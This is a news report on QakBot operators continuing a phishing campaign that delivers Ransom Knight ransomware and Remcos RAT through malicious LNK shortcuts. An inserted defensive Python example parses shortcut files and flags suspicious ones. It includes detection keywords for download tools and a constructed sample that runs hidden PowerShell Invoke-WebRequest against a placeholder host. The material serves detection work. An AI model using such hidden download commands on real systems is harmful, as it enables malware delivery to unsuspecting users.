Despite the disruption to its infrastructure, the threat actors behind the QakBot malware have been linked to an ongoing phishing campaign since early August 2023 that led to the delivery of Ransom Knight (aka Cyclops) ransomware and Remcos RAT.
This indicates that “the law enforcement operation may not have impacted Qakbot operators’ spam delivery infrastructure but rather only their command-and-control (C2) servers,” Cisco Talos researcher Guilherme Venere said in a new report published today.
QakBot, also called QBot and Pinkslipbot, originated as a Windows-based banking trojan in 2007 and subsequently developed capabilities to deliver additional payloads, including ransomware. In late August 2023, the notorious malware operation was dealt a blow as part of an operation named Duck Hunt.
The latest activity, which commenced just before the takedown, starts with a malicious LNK (Windows shortcut) file likely distributed via phishing emails. When the shortcut is launched it kicks off the infection chain and ultimately deploys the Ransom Knight ransomware, a recent rebrand of the Cyclops ransomware-as-a-service (RaaS) scheme.
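Because the chain above begins with a shortcut file, a defender's first triage step is to look at what the .lnk actually launches rather than at its icon. The following is an added example, not code from the Talos report or from this article: a minimal parser for the Windows Shell Link format (MS-SHLLINK) that extracts the target path, command-line arguments and ShowCommand from a shortcut, plus a small heuristic that flags launcher-style shortcuts. The two sample shortcuts, the interpreter list and the argument keywords are constructed and illustrative; they are not artefacts from the QakBot campaign.

```python
import struct

# Added example (not from the Talos report): parse the fields of a .lnk that a
# phishing-delivered shortcut abuses, then apply a cheap triage heuristic.

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

STRING_FIELDS = (  # StringData order is fixed by the spec
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
)
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that launches the target minimised

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields and ShowCommand of a .lnk; raises ValueError on non-LNK input."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"show_command": show_command}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, off)   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields

# Illustrative lists (assumptions, tune for your environment)
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe"}
ARG_KEYWORDS = ("-w hidden", "-windowstyle hidden", "-enc", "-nop", "http://", "https://",
                "downloadstring", "invoke-webrequest", "iwr ", "curl ", "certutil")

def suspicious_indicators(fields: dict) -> list:
    """Triage heuristic: reasons a shortcut deserves a closer look (empty list = nothing odd)."""
    reasons = []
    target = fields.get("relative_path", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if target in INTERPRETERS:
        reasons.append(f"target is a command/script interpreter ({target})")
    args = fields.get("arguments", "").lower()
    hits = [k.strip() for k in ARG_KEYWORDS if k in args]
    if hits:
        reasons.append("arguments contain hidden-execution/download keywords: " + ", ".join(hits))
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (window starts minimised)")
    return reasons

def build_lnk(relative_path: str, arguments: str = None, show_command: int = 1) -> bytes:
    """Build a header-plus-StringData shortcut for offline testing (constructed, not a captured sample)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments is not None else 0)
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, arguments):
        if s is not None:
            body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body + b"\x00\x00\x00\x00"   # ExtraData: TerminalBlock only

# Constructed samples (hypothetical, not campaign artefacts): a launcher-style shortcut and a plain one
LAUNCHER_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                         '/c powershell -w hidden -nop -c "Invoke-WebRequest http://example.invalid/s"',
                         show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("launcher", LAUNCHER_LNK), ("benign", BENIGN_LNK)):
        f = parse_lnk(blob)
        print(label, f.get("relative_path"), f.get("arguments"), suspicious_indicators(f) or "clean")
```

The parser deliberately stops at StringData; real samples often also carry an EnvironmentVariableDataBlock in ExtraData that overrides the target path, so a production tool should walk those blocks as well before trusting `relative_path`. Feed `parse_lnk` the bytes of any attachment with a `.lnk` extension (or the 0x4C/CLSID signature, whatever the extension claims) and route anything with non-empty indicators to analyst review.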
“Given the operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity.”
Cisco Talos told The Hacker News that the attack chains are also being used to deliver other malware such as DarkGate, MetaStealer, and RedLine Stealer.
“Identifying the true scope is difficult but as we’ve already seen the QakBot distribution network is highly effective and has the ability to push large scale campaigns,” Venere told the publication.
“We have observed phishing emails distributing these malware to Italian, German, and English victims which shows the campaign is widespread.”
Source: https://thehackernews.com/2023